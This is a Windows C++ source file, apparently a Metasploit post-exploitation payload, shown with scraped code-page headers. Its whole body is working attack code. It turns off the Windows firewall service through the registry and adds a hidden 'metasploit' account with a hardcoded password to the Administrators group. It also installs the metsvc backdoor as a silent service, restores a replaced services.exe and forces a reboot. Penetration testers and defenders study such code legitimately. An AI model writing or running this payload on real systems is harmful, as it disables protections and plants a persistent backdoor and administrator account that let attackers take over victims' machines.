69 lines
2.5 KiB
C++
69 lines
2.5 KiB
C++
#include <Windows.h>
|
|
#include <Lm.h>
|
|
#pragma comment(lib, "netapi32.lib")
|
|
typedef BOOL (WINAPI *Wow64DisableWow64FsRedirectionFunc) ( __out PVOID *OldValue );
|
|
void start(){
|
|
//fix wow32-64 fsredir
|
|
PVOID OldValue;
|
|
Wow64DisableWow64FsRedirectionFunc disableWow = (Wow64DisableWow64FsRedirectionFunc)GetProcAddress(
|
|
GetModuleHandleA("kernel32"),"Wow64DisableWow64FsRedirection");
|
|
if( disableWow )
|
|
disableWow(&OldValue);
|
|
char windowsPath[MAX_PATH];
|
|
GetWindowsDirectoryA(windowsPath,MAX_PATH);
|
|
SetCurrentDirectoryA(windowsPath);
|
|
|
|
//turn off fw
|
|
HKEY mkey;
|
|
DWORD four = 4;
|
|
RegOpenKeyExA(HKEY_LOCAL_MACHINE,"SYSTEM\\CurrentControlSet\\Services\\MpsSvc",
|
|
0,KEY_SET_VALUE|KEY_WOW64_64KEY,&mkey);
|
|
RegSetValueExA(mkey,"Start",0,REG_DWORD,(PBYTE)&four,sizeof(DWORD));
|
|
RegCloseKey(mkey);
|
|
|
|
//add user
|
|
USER_INFO_1 userinfo;
|
|
userinfo.usri1_name = L"metasploit";
|
|
userinfo.usri1_password = L"p@SSw0rd!123456";
|
|
userinfo.usri1_priv = USER_PRIV_USER;
|
|
userinfo.usri1_home_dir = NULL;
|
|
userinfo.usri1_comment = L"";
|
|
userinfo.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD;
|
|
userinfo.usri1_script_path = NULL;
|
|
DWORD res = NetUserAdd(NULL,1,(PBYTE)&userinfo,NULL);
|
|
if(res == NERR_Success){
|
|
LOCALGROUP_MEMBERS_INFO_3 lgmi3;
|
|
lgmi3.lgrmi3_domainandname = userinfo.usri1_name;
|
|
NetLocalGroupAddMembers(NULL,L"Administrators",3,(PBYTE)&lgmi3,1);
|
|
}
|
|
|
|
//start metsvc
|
|
STARTUPINFOA strt;
|
|
PROCESS_INFORMATION proci;
|
|
for(int i = 0; i < sizeof(strt); i++)
|
|
((char*)&strt)[i]=0;
|
|
for(int i = 0; i < sizeof(proci); i++)
|
|
((char*)&proci)[i]=0;
|
|
if(CreateProcessA("System32\\metsvc.exe","metsvc.exe install-service",NULL,
|
|
NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci) == 0 )//if 64 bit
|
|
CreateProcessA("SysWOW64\\metsvc.exe","metsvc.exe install-service",NULL,
|
|
NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci);
|
|
|
|
//copy file back
|
|
while(CopyFileA("System32\\services.bak.exe","System32\\services.exe",FALSE) == 0)
|
|
Sleep(100);
|
|
|
|
//reboot
|
|
HANDLE tokenh;
|
|
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&tokenh);
|
|
TOKEN_PRIVILEGES tkp, otkp;
|
|
DWORD oldsize;
|
|
tkp.PrivilegeCount = 1;
|
|
LookupPrivilegeValueA(NULL,"SeShutdownPrivilege",&(tkp.Privileges[0].Luid));
|
|
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
|
AdjustTokenPrivileges(tokenh,FALSE,&tkp,sizeof(tkp),&otkp,&oldsize);
|
|
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, SHTDN_REASON_MAJOR_OPERATINGSYSTEM |
|
|
SHTDN_REASON_MINOR_UPGRADE | SHTDN_REASON_FLAG_PLANNED);
|
|
}
|
|
|